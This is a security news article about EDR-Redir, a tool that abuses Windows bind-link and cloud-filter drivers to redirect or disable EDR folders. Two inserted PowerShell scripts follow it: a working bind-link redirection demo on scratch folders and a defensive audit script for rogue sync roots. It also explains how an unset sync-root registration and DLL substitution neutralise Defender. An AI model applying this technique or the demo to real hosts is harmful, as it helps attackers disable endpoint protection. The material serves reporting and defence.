New EDR-Redir Tool Bypasses EDR via Bind and Cloud Filter Drivers

A cybersecurity researcher has unveiled EDR-Redir, a new tool that abuses the Windows bind filter (bindflt.sys) and cloud filter (cldflt.sys) minifilter drivers to neutralise Endpoint Detection and Response (EDR) agents.

The technique redirects an EDR's executable folder to an attacker-controlled location, enabling DLL or executable substitution or a complete outage of the EDR service. It needs local administrator rights but no kernel driver and no kernel-level exploit.

The attack leverages Windows Bind Link, a public API introduced in Windows 11 version 24H2 that maps a virtual path onto a backing path in the filesystem namespace.

Unlike NTFS symbolic links and junctions, which are on-disk reparse points that current EDRs actively monitor and block, bind links are in-memory namespace mappings enforced by the bindflt.sys minifilter, with no reparse point or other on-disk artifact.

Any process that opens the virtual path is transparently served the backing folder's contents, so the redirection looks like ordinary file access to security software.

When EDR-Redir creates a bind link, the only operations it performs on the EDR's folder are opening and reading it, which a local administrator is permitted to do even on protected EDR directories; nothing in the protected folder is written, renamed or deleted, so the file-protection rules EDRs apply to their own install directories are never triggered.
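To make the bind-link behaviour concrete, here is an added PowerShell demonstration on a scratch directory. It is not EDR-Redir's code and not from the researcher's write-up; it calls the documented `CreateBindLink` and `RemoveBindLink` exports of `bindlink.dll` and assumes Windows 11 24H2 or later, an elevated session, and the constructed paths under `C:\Temp\edr-demo` (which stand in for an EDR's executable folder and the attacker's backing folder).

```powershell
# Added example: show what a bind link does to a folder from user mode.
# Assumes Windows 11 24H2+ and an elevated PowerShell session (bind links are system-wide).
$src = @"
using System;
using System.Runtime.InteropServices;
public static class BindLink {
    // bindlink.h: HRESULT CreateBindLink(PCWSTR virtualPath, PCWSTR backingPath,
    //     CREATE_BIND_LINK_FLAGS flags, UINT32 exceptionCount, PCWSTR* exceptionPaths);
    // flags: 0 = NONE, 1 = READ_ONLY, 2 = MERGED
    [DllImport("bindlink.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
    public static extern int CreateBindLink(string virtualPath, string backingPath,
                                            uint flags, uint exceptionCount, string[] exceptionPaths);
    // bindlink.h: HRESULT RemoveBindLink(PCWSTR virtualPath);
    [DllImport("bindlink.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
    public static extern int RemoveBindLink(string virtualPath);
}
"@
Add-Type -TypeDefinition $src

# Constructed paths: $virtual plays the role of a protected EDR folder, $backing the attacker's folder.
$virtual = 'C:\Temp\edr-demo\Protected'
$backing = 'C:\Temp\edr-demo\Backing'
New-Item -ItemType Directory -Force -Path $virtual, $backing | Out-Null
Set-Content -Path "$virtual\real.dll"    -Value 'genuine component'
Set-Content -Path "$backing\planted.dll" -Value 'attacker-controlled component'

'Before bind link:'
Get-ChildItem -Path $virtual -Name          # real.dll

# Only the namespace is changed: real.dll is never written, renamed or deleted.
$hr = [BindLink]::CreateBindLink($virtual, $backing, 0, 0, $null)
if ($hr -ne 0) { throw ('CreateBindLink failed: 0x{0:X8}' -f $hr) }

'After bind link (same path, attacker contents):'
Get-ChildItem -Path $virtual -Name          # planted.dll

# The folder carries no ReparsePoint attribute, so a symlink/junction check sees a plain directory.
'Attributes: ' + (Get-Item -Path $virtual).Attributes

$hr = [BindLink]::RemoveBindLink($virtual)
if ($hr -ne 0) { throw ('RemoveBindLink failed: 0x{0:X8}' -f $hr) }

'After removal:'
Get-ChildItem -Path $virtual -Name          # real.dll again
```

Because the mapping lives in bindflt.sys rather than on disk, the usual reparse-point and directory-ACL checks an EDR runs against its own install folder find nothing to object to; that is the gap the tool exploits.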

The researcher demonstrated successful attacks against Elastic Defend and Sophos Intercept X, redirecting their executable folders to attacker-controlled directories.

When bind link redirection failed against Windows Defender because of its additional self-protection, the researcher developed an alternative approach using the Windows Cloud Filter API, the same cldflt.sys-backed interface that OneDrive and similar sync clients use for placeholder files.

By registering an incomplete sync root over the target folder with CfRegisterSyncRoot, passing a CF_SYNC_POLICIES structure that is left almost entirely unset, the tool leaves the folder in a state the article describes as corrupted: it is now treated as a cloud-backed root with no working provider behind it, and access to its contents fails.

This technique successfully blocked Windows Defender from accessing its own operational directory.

The corrupted sync root persists across system reboots, eliminating the need for scheduled tasks or services to maintain the attack.

After registration, Defender services become unable to start, effectively disabling the antivirus without triggering typical security alerts.

Once attackers control an EDR's executable folder, they can drop malicious DLLs for the EDR to load (DLL hijacking), substitute their own executables for the EDR's so the service launches attacker code at its next start, or leave the folder empty so the EDR cannot start at all on the next boot.

The EDR-Redir tool is available on GitHub, raising concerns about widespread exploitation. Because the redirection is enforced inside the minifilter drivers, user-mode monitoring of the EDR folder sees only benign open and read operations and generates few security events, which makes detection difficult.

While bind links do not survive a reboot, attackers can re-create them through a startup task or service; the cloud filter variant needs no such persistence mechanism because the sync root registration itself persists.

The researcher emphasizes that defense primarily requires EDR vendors to strengthen protection of their own folders against namespace redirection and to monitor bind filter and cloud filter driver activity, in particular bind link creation and sync root registration that targets security-product directories.
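The article recommends monitoring bind filter and cloud filter activity but gives no procedure. The following added PowerShell audit script, which is not part of the article or of EDR-Redir, is one way a defender could check a host for both halves of the technique: it confirms whether bindflt and CldFlt are loaded, enumerates sync roots from the registry location the Cloud Filter API uses (`HKLM\...\Explorer\SyncRootManager`, an assumption about where registrations are stored that holds for OneDrive-style providers), flags any registered over a security-product folder, verifies that those folders are still readable, and can optionally unregister a flagged root with the documented `CfUnregisterSyncRoot` export of `cldapi.dll`. The list of EDR folders is constructed for the example; adjust it to the products actually installed. This also serves the cloud-filter persistence passage above, since a surviving sync root is exactly what it looks for.

```powershell
# Added example: audit a host for the bind filter / cloud filter abuse described in the article.
# Assumes an elevated session. Run with -Remove to unregister flagged sync roots.
param([switch]$Remove)

# Constructed list of protected folders; extend for the EDRs deployed in your estate.
$edrFolders = @(
    "$env:ProgramFiles\Windows Defender",
    "$env:ProgramFiles\Elastic\Endpoint",
    "$env:ProgramFiles\Sophos"
)

# 1. Are the two minifilters this technique depends on loaded? (first column of `fltmc filters`)
$loaded = fltmc filters | ForEach-Object { ($_ -split '\s+')[0] } |
          Where-Object { $_ -and $_ -notmatch '^(Filter|-+)$' }
foreach ($f in 'bindflt', 'CldFlt') {
    '{0,-8} {1}' -f $f, $(if ($loaded -contains $f) { 'loaded' } else { 'not loaded' })
}

# 2. Sync roots registered over EDR folders. Each registration is a key under SyncRootManager
#    with a UserSyncRoots subkey whose values are SID -> root path (assumption about the layout).
$srm = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager'
$suspicious = foreach ($root in Get-ChildItem -Path $srm -ErrorAction SilentlyContinue) {
    $usr = Join-Path -Path $root.PSPath -ChildPath 'UserSyncRoots'
    if (-not (Test-Path -Path $usr)) { continue }
    $props = Get-ItemProperty -Path $usr
    foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -like 'S-1-*' })) {
        $path = ([string]$p.Value).TrimEnd('\')
        foreach ($edr in $edrFolders) {
            if ($path -like "$edr*") {
                [pscustomobject]@{ SyncRootId = $root.PSChildName; Sid = $p.Name; Path = $path }
            }
        }
    }
}

# 3. Can the EDR folders still be read? A corrupted sync root shows up here as an access failure.
foreach ($edr in $edrFolders) {
    if (-not (Test-Path -Path $edr)) { continue }
    try {
        $n = @(Get-ChildItem -Path $edr -ErrorAction Stop).Count
        '{0}: readable, {1} entries' -f $edr, $n
    } catch {
        '{0}: NOT READABLE ({1})' -f $edr, $_.Exception.Message
    }
}

if (-not $suspicious) { 'No sync roots registered over EDR folders.'; return }
'Sync roots registered over EDR folders:'
$suspicious | Format-Table -AutoSize

# 4. Optional remediation via the documented Cloud Filter API.
if ($Remove) {
    Add-Type -TypeDefinition @"
using System.Runtime.InteropServices;
public static class CloudFilter {
    // cldapi.h: HRESULT CfUnregisterSyncRoot(LPCWSTR SyncRootPath);
    [DllImport("cldapi.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
    public static extern int CfUnregisterSyncRoot(string SyncRootPath);
}
"@
    foreach ($s in $suspicious) {
        $hr = [CloudFilter]::CfUnregisterSyncRoot($s.Path)
        if ($hr -eq 0) {
            'Unregistered sync root over {0}' -f $s.Path
        } else {
            # Fallback (assumption): an incomplete registration may not unregister cleanly by path,
            # so remove the registration key itself and reboot afterwards.
            'CfUnregisterSyncRoot failed 0x{0:X8}; deleting registry key {1}' -f $hr, $s.SyncRootId
            Remove-Item -Path (Join-Path -Path $srm -ChildPath $s.SyncRootId) -Recurse -Force
        }
    }
}
```

Run it on a clean reference host first to learn what legitimate sync roots (OneDrive, enterprise sync clients) look like, then schedule it or fold the registry and folder-readability checks into your EDR's own health monitoring; an access failure on the EDR's install directory, or any sync root whose path sits under it, should be treated as a tamper event rather than a disk error.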

This discovery highlights a critical gap in current EDR security architectures that vendors must address urgently.


AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.
